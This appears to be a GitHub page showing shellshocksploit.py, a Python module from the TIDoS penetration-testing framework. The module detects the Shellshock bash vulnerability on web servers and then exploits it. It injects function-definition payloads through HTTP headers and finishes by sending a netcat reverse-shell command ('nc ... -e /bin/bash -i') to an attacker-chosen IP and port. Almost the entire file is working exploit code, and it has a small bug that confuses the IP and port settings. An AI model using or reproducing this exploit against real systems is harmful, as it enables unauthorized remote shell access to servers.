-
Notifications
You must be signed in to change notification settings - Fork 389
/
Copy pathshellshocksploit.py
94 lines (82 loc) · 3.32 KB
/
shellshocksploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
#!/usr/bin/env python3
# coding: utf-8
#-:-:-:-:-:-:-:-:-:-:-:-:#
# TIDoS Framework #
#-:-:-:-:-:-:-:-:-:-:-:-:#
#Author: @_tID
#This module requires TIDoS Framework
#https://github.com/0xInfection/TIDoS-Framework
from core.methods.tor import session
import time
from random import *
import string
import re
from core.Core.colors import *
info = "Shellshock Exploit."
searchinfo = "Shellshock Exploit"
properties = {"SHELL-IP":["IP for the reverse shell to connect to", " "], "SHELL-PORT":["Port for the reverse shell to connect to", " "]}
def shellshock0x00(web):
requests = session()
print(GR+' [*] Parsing strings...')
time.sleep(0.5)
r_str = ''.join(Random().sample(string.ascii_letters, 30))
print(GR+' [*] Configuring payloads...')
con = '() { :;}; echo; echo; echo %s'%(r_str)
cmd = "() { test;};/bin/nopatchobfu"
headers = {'User-agent': cmd}
time.sleep(0.5)
print(C+' [*] Making no-verify request...')
time.sleep(1)
r = requests.get(web, headers=headers, verify=False)
if r.status_code == 500 or r.status_code == 502:
print(G+' [+] The website seems Vulnerable to Shellshock...'+C+color.TR2+C)
time.sleep(0.5)
print(C+' [*] Confirming the vulnerability...'+C)
headers = {
'User-Agent' : con,
'Cookie' : con,
'Referer' : con
}
resp = requests.get(web, headers=headers, verify=False)
if resp.status_code == 200:
if re.search(r_str,resp.content,re.I):
print(O+' [+] ShellShock was found in:'+C+color.TR3+C+G+resp.url+C+color.TR2+C)
print(P+' [*] Preparing for the exploitation phase...'+C)
time.sleep(0.4)
print(GR+' [*] Configuring payload...')
if properties["SHELL-IP"][1] == " ":
ip = input(C+' [§] Enter reverse IP :> ')
else:
ip = properties["SHELL-PORT"][1]
if properties["SHELL-IP"][1] == " ":
port = input(' [§] Enter port :> ')
else:
port = properties["SHELL-PORT"][1]
exp = '() { :; }; /bin/bash -c "nc -v '+str(ip)+' '+str(port)+' -e /bin/bash -i"'
time.sleep(0.7)
print(C+' [!] Using payload : '+B+exp)
print(GR+' [*] Exploiting...')
time.sleep(1)
print(P+' [!] Using no-verify mode to avoid IP leakage...'+C)
try:
head = {'User-agent':exp}
r=requests.get(web, headers=head, verify=False)
except Exception:
print(R+' [-] Exploit failed...')
else:
print(R+' [-] 2nd phase of detection does not reveal vulnerability...')
print(R+' [!] Please check manually...')
else:
print(R+' [-] The website seems immune to shellshock...')
def shellshock_exp(web):
print(GR+'\n [*] Loading module...')
time.sleep(0.5)
#print(R+'\n ================================')
#print(R+' S H E L L S H O C K (Exploit)')
#print(R+' ================================\n')
from core.methods.print import psploit
psploit("shellshock")
shellshock0x00(web)
def attack(web):
web = web.fullurl
shellshock_exp(web)